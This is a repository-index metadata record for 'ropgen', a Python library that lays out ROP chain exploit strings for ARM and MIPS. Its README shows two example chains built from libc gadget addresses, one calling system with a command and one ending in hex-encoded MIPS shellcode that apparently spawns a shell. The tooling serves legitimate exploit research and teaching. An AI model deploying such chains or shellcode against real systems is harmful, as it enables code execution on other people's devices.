{"id":37073278,"url":"https://github.com/extremecoders-re/ropgen","last_synced_at":"2026-01-14T08:36:05.782Z","repository":{"id":57462647,"uuid":"96391878","full_name":"extremecoders-re/ropgen","owner":"extremecoders-re","description":"A python module to facilitate in the generation of rop string for ARM and MIPS .","archived":false,"fork":false,"pushed_at":"2019-08-09T06:33:48.000Z","size":10,"stargazers_count":5,"open_issues_count":0,"forks_count":2,"subscribers_count":1,"default_branch":"master","last_synced_at":"2025-10-26T19:35:59.854Z","etag":null,"topics":["arm","exploitation","mips","python","rop","rop-exploitation","rop-gadgets"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/extremecoders-re.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2017-07-06T05:30:53.000Z","updated_at":"2024-11-16T19:56:35.000Z","dependencies_parsed_at":"2022-09-05T15:41:04.995Z","dependency_job_id":null,"html_url":"https://github.com/extremecoders-re/ropgen","commit_stats":null,"previous_names":[],"tags_count":1,"template":false,"template_full_name":null,"purl":"pkg:github/extremecoders-re/ropgen","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/extremecoders-re%2Fropgen","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/extremecoders-re%2Fropgen/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/extremecoders-re%2Fropgen/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/extremecoders-re%2Fropgen/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/extremecoders-re","download_url":"https://codeload.github.com/extremecoders-re/ropgen/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/extremecoders-re%2Fropgen/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":28414557,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-01-14T08:31:27.429Z","status":"ssl_error","status_checked_at":"2026-01-14T08:31:19.098Z","response_time":107,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["arm","exploitation","mips","python","rop","rop-exploitation","rop-gadgets"],"created_at":"2026-01-14T08:36:05.054Z","updated_at":"2026-01-14T08:36:05.767Z","avatar_url":"https://github.com/extremecoders-re.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# Ropgen\n\nA python module to facilitate in the generation of ROP chain exploit string, especially for ARM and MIPS architecture.\n\nAfter we have found out the gadgets which will be used in the ROP chain we need to lay out them. The gadgets needs be placed at specific offsets within the exploit string with filler bytes separating them.\n\nThis python module assists in the creation of such ROP strings. You can build the string by specifying the offsets and the value that will be placed at that offset. A value can be a byte, word, double word, quad word or string.\n\nAdditionally, you can summarize the generated rop string in the form of a nice ascii table.\n\n# Installation\n\nRopgen is available on PyPI. \n\n[![PyPI version](https://badge.fury.io/py/ropgen.svg)](https://badge.fury.io/py/ropgen)\n\nTo install systemwide (requires root privileges)\n\n```\n# pip install ropgen\n```\n\nOr to do a local install to the user home directory (doesn't require root)\n\n```\n$ pip install --user ropgen\n```\n\n## Example-1\n\n```python\n#!/usr/bin/env python2\nfrom ropgen import RopGen\n\nlibc = 0x2ab3e000\ngadget1 = 0x27eb4\nsleep = 0x2f2b0\nsystem = 0x2bfd0\ngadget2 = 0x267b0\ngadget3 = 0x171cc\n\n# endianess is le by default\nrop = RopGen()\nrop.set_dword(51, libc + gadget1, \"Gadget 1\")\nrop.set_dword(158, libc + sleep, \"sleep\")\nrop.set_dword(170, libc + system, \"system\")\nrop.set_dword(194, libc + gadget2, \"Gadget 2\")\nrop.set_dword(226, libc + gadget3, \"Gadget 3\")\nrop.set_string(254, \"id; \\x00\", \"Payload\")\n\nprint rop.build()\nprint rop.summarize()\n```\n\n**Output**\n\n```\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�^�*AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�Ҷ*AAAAAAAAП�*AAAAAAAAAAAAAAAAAAAA�G�*AAAAAAAAAAAAAAAAAAAAAAAAAAAA�Q�*AAAAAAAAAAAAAAAAAAAAAAAAid; \n+--------+---------------------+-----------------+\n| Offset | Content description | Length in bytes |\n+========+=====================+=================+\n| 0      | Padding Bytes       |       51        |\n+--------+---------------------+-----------------+\n| 51     | Gadget 1            |        4        |\n+--------+---------------------+-----------------+\n| 55     | Padding Bytes       |       103       |\n+--------+---------------------+-----------------+\n| 158    | sleep               |        4        |\n+--------+---------------------+-----------------+\n| 162    | Padding Bytes       |        8        |\n+--------+---------------------+-----------------+\n| 170    | system              |        4        |\n+--------+---------------------+-----------------+\n| 174    | Padding Bytes       |       20        |\n+--------+---------------------+-----------------+\n| 194    | Gadget 2            |        4        |\n+--------+---------------------+-----------------+\n| 198    | Padding Bytes       |       28        |\n+--------+---------------------+-----------------+\n| 226    | Gadget 3            |        4        |\n+--------+---------------------+-----------------+\n| 230    | Padding Bytes       |       24        |\n+--------+---------------------+-----------------+\n| 254    | Payload             |        5        |\n+--------+---------------------+-----------------+\n```\n\n## Example-2\n\n```python\n#!/usr/bin/env python3\nfrom ropgen import RopGen\n\nlibc = 0x40854000\ngadget1 = libc + 0x000158dc\ngadget2 = libc + 0x00037690\ngadget3 = libc + 0x0000b830\ngadget4 = libc + 0x00040e18 + 4\nsleep = libc + 0x56bd0\n\nshell = bytes.fromhex('6269093c2f2f2935f4ffa9af7368093c6'\\\n\t'e2f2935f8ffa9affcffa0aff4ffbd2720'\\\n\t'20a003fcffa0affcffbd27ffff0628fcf'\\\n\t'fa6affcffbd232030a00373680934fcff'\\\n\t'a9affcffbd27ffff0528fcffa5affcffb'\\\n\t'd23fbff1924272820032028bd00fcffa5'\\\n\t'affcffbd232028a003ab0f02340c010101')\n\nrop = RopGen(endian='be', padding='B')\nrop.set_dword(260, sleep, \"sleep\")\nrop.set_dword(276, gadget2, \"gadget2\")\nrop.set_dword(292, gadget1 , \"gadget1\")\nrop.set_dword(296 + 0x24, gadget3, \"gadget3\")\nrop.set_dword(296 + 0x20, gadget4, \"gadget4\")\nrop.set_string(296 + 0x28 + 0xb8, shell, \"shellcode\")\nrop.build()\nprint(rop.summarize())\n```\n**Output**\n\n```\n+--------+---------------------+-----------------+\n| Offset | Content description | Length in bytes |\n+========+=====================+=================+\n| 0      | Padding Bytes       |       260       |\n+--------+---------------------+-----------------+\n| 260    | sleep               |        4        |\n+--------+---------------------+-----------------+\n| 264    | Padding Bytes       |       12        |\n+--------+---------------------+-----------------+\n| 276    | gadget2             |        4        |\n+--------+---------------------+-----------------+\n| 280    | Padding Bytes       |       12        |\n+--------+---------------------+-----------------+\n| 292    | gadget1             |        4        |\n+--------+---------------------+-----------------+\n| 296    | Padding Bytes       |       32        |\n+--------+---------------------+-----------------+\n| 328    | gadget4             |        4        |\n+--------+---------------------+-----------------+\n| 332    | gadget3             |        4        |\n+--------+---------------------+-----------------+\n| 336    | Padding Bytes       |       184       |\n+--------+---------------------+-----------------+\n| 520    | shellcode           |       116       |\n+--------+---------------------+-----------------+\n```\n\n# License\n\nLicensed under MIT.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fextremecoders-re%2Fropgen","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fextremecoders-re%2Fropgen","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fextremecoders-re%2Fropgen/lists"}